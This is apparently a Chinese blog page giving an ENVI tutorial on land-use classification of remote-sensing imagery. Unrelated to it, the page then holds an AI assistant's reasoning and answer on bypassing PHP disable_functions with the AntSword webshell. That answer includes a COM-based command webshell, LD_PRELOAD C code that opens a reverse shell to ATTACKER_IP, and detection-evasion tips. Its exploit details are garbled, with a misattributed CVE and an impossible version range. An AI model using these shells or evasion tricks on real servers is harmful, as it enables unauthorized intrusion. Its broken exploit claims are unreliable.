ENVI遥感影像解译制作土地利用专题图

该文详细介绍了使用ENVI软件进行遥感图像处理的步骤,包括改变RGB带、创建ROI、计算可分类度、应用最大自然法分类器进行分类,以及后续的图层合并、裁剪和最大最小值合并操作,最终在GIS中进行展示和优化,用于生态评价制图。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  1. ENVI打开裁剪完的影像,右键单击图层,选择Change RGB Bands,在弹出的对话框中按照如图所示从上到下依次选择,得出类似于下面的图。

  2. 右键单击图层,选择New Region of Interest,命名为林地1,颜色选择为绿色。

  3. 新建一个ROI图层,命名为林地2,更改颜色。

  4. 按照上面的步骤依次建立下面的图层,得到的效果类似于下图(样本的选择根据经验自己判断)。

  5. 点击Options--Compute ROI Separability,在Choose ROIs对话框中点击ok,计算可分类度。

  6. 一般可分类值大于1.8表明这个图层可分类性是非常好的。

  7. 在工具箱中找到最大自然法分类器。

  8. 在弹出的对话框中选择原始文件,点击ok。

  9. 在最大自然法分类器对话框中选择要用的序列样本,注意勾选none和No,最后选择输出路径,点击ok。

  10. 得到如下图的分类结果。

  11. 保存样本,右键单击样本图层--Save As,选择输出路径。

  12. 在工具箱中找到裁剪工具,

  13. 在弹出的对话框中选择分类过后的图层。

    14.在工具箱中选择对类别进行合并的工具。

    15.在弹出的对话框中选择分类完的图层。

    16.分别选择两个框中的水,点击下面的合并。

    17.林地1和林地2均合并到林地1,耕地和耕地1均合并到耕地(算法的逻辑关系),点击ok。

    18.将空类别删除,选择输出路径,点击ok。

    19.最后做一个最大最小值合并(分类后处理的一步)。

    20.选择合并完的图层,点击ok。

    21.选择合并的图层,选择输出路径,点击ok。

    22.对最大最小值合并完的图层进行剪切(公众号中的第二种剪切方法),关闭unclassified。

    23.File-Save As-Save As.....,保存为TIFF格式,选择输出路径。

    24.打开GIS,显示如下界面。

    25.右键单击图层属性-符号系统-唯一值-0(即背景)-移除,得到下面的图。

    26.切换到布局视图,按照公众号上一篇的方法输出图片。左键双击颜色名称可重命名。输出分辨率一般选择300。

    27.最后得到如下所示图片。

基于遥感解译的生态评价制图实践

树谷资料库资源大全(2月9日更新)

<think>好的,我现在需要帮助用户了如何绕过PHP的disable_functions限制,特别是使用蚁剑(AntSword)进行渗透测试的技术细节。首先,我需要回忆一下用户提供的参考引用内容,这些引用提到了几种绕过方法,比如php-json-bypass漏洞、Windows COM组件利用,以及蚁剑插件的相关利用方式。 首先,用户的问题主要集中在蚁剑如何绕过disable_functions,所以可能需要具体说明蚁剑支持的插件或方法。根据引用[1]和[2],php-json-bypass漏洞利用了PHP的json序列化程序中的堆溢出,适用于特定版本(如PHP 7.3.15到7.3.6之前)。而引用[2]还提到蚁剑插件中有集成这个漏洞的利用方式,这可能是一个关键点。 然后,引用[3]提到利用Windows COM组件绕过disable_functions,这可能在Windows服务器环境下有效。需要确认蚁剑是否支持这种方法,或者是否需要手动上传特定的PHP文件如com_rce.php。 接下来,我需要考虑用户可能需要了的步骤,比如环境检测、插件使用、具体漏洞利用过程,以及不同方法的适用条件。例如,LD_PRELOAD绕过法需要存在未禁用的函数如mail(),而ImageMagick漏洞则需要服务器安装了该软件。 同时,必须注意这些方法的合法性,强调渗透测试需要授权,避免用户误用。此外,要确保回答结构清晰,分点说明不同方法,并结合用户提供的引用来源,正确标注引用标记。 最后,生成相关问题,帮助用户进一步探索相关技术细节和防御措施。需要确保问题覆盖不同绕过方法、环境检测、工具使用以及防御建议,这样用户可以有全面的了。</think>### 绕过PHP disable_functions限制的蚁剑利用方法 #### 1. **前置条件与环境检测** - 确认目标PHP版本和操系统类型(Linux/Windows) - 检查`disable_functions`列表是否禁用关键函数如`exec`、`shell_exec`等 - 查看是否存在可写目录权限(如`/tmp`或上传目录)[^1] #### 2. **常用Bypass方法及技术实现** **(1) PHP-JSON-Bypass (CVE-2019-11043)** ```php // 利用json序列化堆溢出触发命令执行 $payload = json_decode('{"@type":"C","@properties":{"a":1}}'); ``` - **适用条件**:PHP 7.3.15 < 版本 < 7.3.6 - **蚁剑操**:使用`php-json-bypass`插件自动生成攻击载荷[^2] **(2) Windows COM组件利用** ```php $command = $_GET['cmd']; $wscript = new COM('WScript.Shell'); $exec = $wscript->Exec('cmd /c '.$command); ``` - **适用条件**:Windows服务器 + 启用COM组件 - **步骤**:上传`com_rce.php`后通过蚁剑连接[^3] **(3) LD_PRELOAD劫持** ```c // evil_lib.c #include <stdlib.h> __attribute__ ((__constructor__)) void angel (void){ unsetenv("LD_PRELOAD"); system("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'"); } ``` - **触发方式**:通过`putenv`+`mail()`函数链加载恶意so文件 #### 3. **蚁剑插件化利用流程** ```mermaid graph TD A[环境检测] --> B{系统类型} B -->|Linux| C[尝试LD_PRELOAD/GC_UAF] B -->|Windows| D[尝试COM组件/FFI扩展] C --> E[上传.so/.php后门] D --> F[执行COM命令] ``` #### 4. **防御规避要点** - 使用`pcntl_exec`替代`system`等敏感函数 - 通过`stream_wrapper`伪装成正常文件操 - 利用PHP-FPM未授权访问漏洞建立隐蔽通道
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值